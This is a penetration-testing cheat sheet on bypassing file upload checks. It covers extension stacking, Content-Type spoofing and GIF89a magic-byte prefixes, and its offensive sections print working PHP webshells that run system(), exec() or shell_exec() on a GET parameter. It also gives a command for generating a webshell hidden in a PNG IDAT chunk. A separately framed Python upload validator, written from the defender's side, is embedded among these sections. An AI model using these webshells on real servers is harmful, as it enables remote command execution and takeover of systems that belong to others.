File Upload Tricks

When uploading files, check for validation on:

  1. File extension

    • Server side: which extensions are allowed?

    php
    phtml
    php4

    • Stacking / double extension

    .php.png
    .%20.php

Using a GIF signature (shell.php):

GIF89a;
<?php
system($_GET['cmd']);
?>

Advanced: GIF signature with a spoofed Content-Type in the multipart part headers

Content-Disposition: form-data; name="upload"; filename="web.php"
Content-Type: image/png

GIF89a;
<?php
system($_GET['cmd']);
?>

  2. Content-Type header

  • Is a server-side extension such as .php accepted despite the upload restriction?

    - If yes, change the Content-Type header to an image type; the file will still run as PHP.

  • Does the server validate the Content-Type header, e.g. by disallowing application/json?

  3. Magic bytes (file signature, the leading hex values)

  • Does the server check the file signature?

  • If not, the file signature can be changed with a hex editor (hexedit).

PHP Function Exploit

When the upload is re-encoded with GD functions such as imagecopyresampled() or imagecreatefromstring(), anything appended after the image data is discarded.

Solution: hide the webshell in the IDAT chunk of a PNG

https://github.com/huntergregal/PNG-IDAT-Payload-Generator/tree/master
python3 generate.py -m php -o webshell.png

Rename to webshell.png.php
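The three checks above (extension, Content-Type, magic bytes) and the re-encoding note are what a server has to get right to stop these tricks. The following is an added example written from the defender's side; it is not code from this page or from the PNG-IDAT generator project. The signature table, the extension sets and the sample filenames and bodies are constructed for the example. It rejects the stacked and percent-encoded extensions, ignores the client Content-Type, derives the real type from the leading bytes, and refuses the GIF89a-prefixed shell; the comments note why that last scan is not enough on its own.

```python
import secrets
import urllib.parse
from typing import Optional

# Magic-byte signatures for the image types listed on this page (constructed table).
SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}
# Server-side script extensions that must not appear anywhere in the name;
# checking every suffix blocks the stacked forms ".php.png" and ".%20.php".
SCRIPT_EXTENSIONS = {"php", "phtml", "php3", "php4", "php5", "phar"}


def sniff_type(data: bytes) -> Optional[str]:
    """Return the type implied by the leading bytes, or None if unrecognised."""
    for magic, ext in SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def validate_upload(filename: str, client_content_type: str, data: bytes) -> dict:
    """Apply the page's three checks from the server's side.

    Returns {"accepted": bool, "reason": str, ...}; on acceptance "stored_name"
    is a server-generated name whose extension comes from the signature,
    never from the client.
    """
    # 1. Extension: percent-decode first so ".%20.php" is seen as ". .php",
    #    then inspect every dot-separated suffix, not only the last one.
    decoded = urllib.parse.unquote(filename)
    suffixes = [s.strip().lower() for s in decoded.split(".")[1:]]
    if not suffixes:
        return {"accepted": False, "reason": "no extension"}
    if any(s in SCRIPT_EXTENSIONS for s in suffixes):
        return {"accepted": False, "reason": "script extension in filename"}
    if suffixes[-1] not in ALLOWED_EXTENSIONS:
        return {"accepted": False, "reason": "extension not allowed"}

    # 2. Content-Type: set by the client, so it is recorded but never trusted.
    # 3. Magic bytes: derive the real type from the bytes and require it to
    #    agree with the extension the client claimed (jpeg and jpg are the same).
    sniffed = sniff_type(data)
    if sniffed is None:
        return {"accepted": False, "reason": "unknown file signature"}
    claimed = "jpg" if suffixes[-1] == "jpeg" else suffixes[-1]
    if claimed != sniffed:
        return {"accepted": False, "reason": "extension/signature mismatch"}

    # A valid signature proves nothing about the remaining bytes: the GIF89a +
    # <?php file above passes step 3.  A tag scan catches that plain case but
    # not a payload hidden in a compressed IDAT chunk; what handles that is
    # re-encoding the image with an image library and storing it outside the
    # web root under the server-chosen name returned below.
    if b"<?php" in data or b"<?=" in data:
        return {"accepted": False, "reason": "script content inside image"}

    return {
        "accepted": True,
        "reason": "ok",
        "type": sniffed,
        "client_content_type": client_content_type,
        "stored_name": f"{secrets.token_hex(16)}.{sniffed}",
    }


if __name__ == "__main__":
    # Constructed samples mirroring the tricks on this page.
    gif_shell = b"GIF89a;\n<?php\nsystem($_GET['cmd']);\n?>\n"
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    for name, ctype, body in [
        ("web.php", "image/png", gif_shell),
        ("shell.php.png", "image/png", gif_shell),
        ("shell.%20.php", "image/gif", gif_shell),
        ("avatar.gif", "image/gif", gif_shell),
        ("avatar.png", "image/gif", b"GIF89a;" + png),
        ("avatar.png", "image/png", png),
    ]:
        print(name, validate_upload(name, ctype, body))
```

The ordering matters: the extension check runs on every suffix of the percent-decoded name, so neither renaming to webshell.png.php nor the %20 variant reaches the signature check, and an accepted file is stored under a name the client never chose.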

Shell exec

PHP

shell_exec(), exec(), system()

Examples

<?php echo shell_exec($_GET['command']); ?>
<?php echo exec($_GET['command']); ?>
<?php echo system($_GET['command']); ?>
<?php echo exec($_GET['e'].' 2>&1'); ?>
<?php system($_GET['e'].' 2>&1'); ?>
<?php echo shell_exec($_GET['e'].' 2>&1'); ?>

Content-Types of Common Files

Pictures:

image/png
image/jpeg
image/gif

JSON:

application/json

PHP:

application/x-php
application/x-www-form-urlencoded
multipart/form-data
application/octet-stream

TXT:

text/plain

XML:

application/xml
text/xml

HTML:

text/html

JavaScript:

text/javascript
application/javascript

PDF:

application/pdf

Audio:

audio/mpeg
audio/wav

Video:

video/mp4
video/quicktime
